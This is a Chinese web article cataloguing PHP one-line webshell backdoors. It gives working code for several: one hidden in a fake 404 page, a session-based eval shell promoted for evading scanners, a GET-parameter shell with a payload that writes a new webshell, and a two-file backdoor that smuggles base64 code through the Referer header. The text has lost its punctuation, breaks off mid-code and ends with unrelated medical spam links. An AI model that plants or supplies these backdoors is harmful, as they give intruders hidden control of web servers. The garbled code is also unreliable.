时间:2016-11-29来源:本站原创作者:佚名

这类后门让网站、服务器管理员很是头疼,经常要换着方法进行各种检测,而很多新出现的编写技术,用普通的检测方法是没法发现并处理的。今天细数一些有意思的PHP一句话木马。利用页面隐藏PHP小马:!DOCTYPEHTMLPUBLIC-//IETF//DTDHTML2.0//ENhtmlheadtitleNotFound/title/headbodyh1NotFound/h1pTherequestedURLwasnotfoundonthisserver./p/body/html?php

preg_replace(/[pageerror]/e,$_POST[error],saft);header(HTTP/1.1NotFound);?页面是网站常用的文件,一般建议好后很少有人会去对它进行检查修改,这时我们可以利用这一点进行隐藏后门。无特征隐藏PHP一句话:?phpsession_start();$_POST[code]$_SESSION[theCode]=trim($_POST[code]);$_SESSION[theCode]preg_replace(\a\eis,e.v.a.l.(base64_decode($_SESSION[\theCode\])),a);?将$_POST[code]的内容赋值给$_SESSION[theCode],然后执行$_SESSION[theCode],亮点是没有特征码。用扫描工具来检查代码的话,是不会报警的,达到目的了。超级隐蔽的PHP后门:?php$_GET[a]($_GET[b]);?仅用GET函数就构成了木马;利用方法:?a=assertb=${fputs%28fopen%28base64_decode%28Yy5waHA%29,w%29,base64_decode%28PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgPz4x%29%29};执行后当前目录生成c.php一句话木马,当传参a为eval时会报错木马生成失败,为assert时同样报错,但会生成木马,真可谓不可小视,简简单单的一句话,被延伸到这般应用。层级请求,编码运行PHP后门:此方法用两个文件实现,文件1?php//1.phpheader(Content-type:text/html;charset=utf-8);parse_str($_SERVER[HTTP_REFERER],$a);if(reset($a)==10count($a)==9){eval(base64_decode(str_replace(,+,implode(array_slice($a,6)))));}?文件2?php//2.phpheader(Content-type:text/html;charset=utf-8);//要执行的代码$code=CODEphpinfo();CODE;//进行base64编码$code=base64_encode($code);//构造referer字符串$referer=a=10b=abc=34d=ree=32f=kmg={$code}h=i=;//后门url$url=







































新生儿肠子挤入胸腔出生后24小时打3个
前列腺囊肿的危害性有哪些

转载请注明原文网址:http://www.coolofsoul.com/hjpz/12841.html
------分隔线----------------------------